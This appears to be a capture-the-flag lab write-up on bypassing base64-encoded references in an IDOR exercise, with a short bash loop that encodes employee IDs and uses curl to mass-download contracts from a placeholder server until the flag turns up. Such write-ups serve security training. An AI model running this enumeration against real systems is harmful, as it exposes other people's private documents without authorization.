Bypassing Encoded References

Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly

In this exercise we must look for the flag in the Contracts page. When we download a contract we can see that we intercept a GET Request. The contract parameter has the value MQ==, which is the base64 encoded value for 1.

Since this looks a pretty straight forward encoding method we can automatize the download process with a bash script:

#!/bin/bash

for i in {1..20}; do
    for hash in $(echo -n $i | base64 -w 0 | tr -d ' -'); do
        curl -sOJ -X GET "http://SERVER_IP:SERVER_PORT/download.php?contract=$hash"
    done
done

After execute the script let's list all the files downloaded with ls -l.

We can clearly see that one of the files stands out.

And we got the flag!

PreviousMass IDOR Enumeration NextIDOR in Insecure APIs

Last updated 8 months ago

hashtagTry to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly

Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly